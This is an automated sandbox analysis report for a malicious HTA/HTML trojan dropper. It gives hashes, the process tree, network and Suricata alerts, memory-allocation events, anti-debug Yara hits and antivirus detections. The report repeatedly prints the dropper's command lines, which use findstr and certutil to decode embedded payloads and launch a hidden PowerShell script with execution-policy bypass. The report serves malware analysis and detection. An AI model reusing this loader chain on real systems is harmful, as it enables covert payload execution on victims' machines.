Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 23, 2025, 12:09 p.m.	April 23, 2025, 12:11 p.m.

Size	163.1KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`f32e7891e2cfc58230057a506325c3c8`
SHA256	`02783530bbd8416ebc82ab1eb5bbe81d5d87731d24c6ff6a8e12139a5fe33cee`
CRC32	`F5A218AF`
ssdeep	`3072:UPzcBmc2YlnFBQsDqzpj8sfZCQiItHU/j1ICbM+33Eci:Acz29RNxY71ICAG3Eci`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\sfmw.hta.html
2144
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2144 CREDAT:145409
  1184
  - cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
    1728
    - findstr.exe findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html"
      2688
  - cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
    2552
    - findstr.exe findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html"
      2468

Name	Response	Post-Analysis Lookup
cacerts.digicert.com	CNAME crl.edge.digicert.com A 23.36.55.181 CNAME cac-ocsp.digicert.com.edgekey.net CNAME e3913.cd.akamaiedge.net	184.50.179.49

IP Address	Status	Action
164.124.101.2	Active	Moloch
23.36.55.181	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49173 -> 52.239.160.33:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49171 -> 52.239.160.33:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49173 52.239.160.33:443	C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 03	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=*.web.core.windows.net	22:d9:a8:14:ff:86:7a:4b:f0:95:ea:b0:9f:c1:b5:62:6b:b0:62:a9
TLSv1 192.168.56.102:49171 52.239.160.33:443	C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 03	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=*.web.core.windows.net	22:d9:a8:14:ff:86:7a:4b:f0:95:ea:b0:9f:c1:b5:62:6b:b0:62:a9

Performs some HTTP requests (1 event)

request

GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 55 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 region_size: 15929344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000028e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002f60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef69c9000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 region_size: 13242368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002de0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077186000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d6000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077181000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076ba0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772af000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772bb000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe117000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbe4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2025, 12:09 p.m.	process_identifier: 1184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbe1000 process_handle: 0xffffffffffffffff	1

Creates a suspicious process (3 events)

cmdline	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 23, 2025, 12:09 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf filepath: cmd	1	1
CreateProcessInternalW April 23, 2025, 12:09 p.m.	thread_identifier: 2120 thread_handle: 0x00000000000004ec process_identifier: 2552 current_directory: C:\Users\test22\Desktop filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004d8	1	1
ShellExecuteExW April 23, 2025, 12:09 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log filepath: cmd	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
cmdline	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2144 CREDAT:145409

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

ALYac	Trojan.Script.Agent
ESET-NOD32	VBS/TrojanDropper.Agent.PMU
TrendMicro-HouseCall	TROJ_FRS.VSNTCP25
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.HTA.SAgent.gen
Rising	Dropper.Agent/VBS!8.12129 (TOPIS:E0:ycYbowpsUbT)
TrendMicro	Trojan.HTML.FRS.VSNW19C25
Ikarus	Trojan-Dropper.VBS.Agent
Google	Detected
GData	HTML.Trojan.Agent.W50GPS
Varist	ABTrojan.BKWY-
AhnLab-V3	Trojan/VBS.Obfuscated.SC261281
AVG	Script:SNH-gen [Trj]
alibabacloud	Trojan[dropper]:Win/Agent.PZW

A command shell or script process was created by an unexpected parent process (2 events)

parent_process	iexplore.exe				martian_process	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe				martian_process	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf

One or more non-whitelisted processes were created (4 events)

parent_process	iexplore.exe	martian_process	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe	martian_process	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
parent_process	iexplore.exe	martian_process	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2144 resumed a thread in remote process 1184
NtResumeThread April 23, 2025, 12:09 p.m.	thread_handle: 0x0000000000000360 suspend_count: 1 process_identifier: 1184	1	0	0

Creates a suspicious Powershell process (6 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

sfmw.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All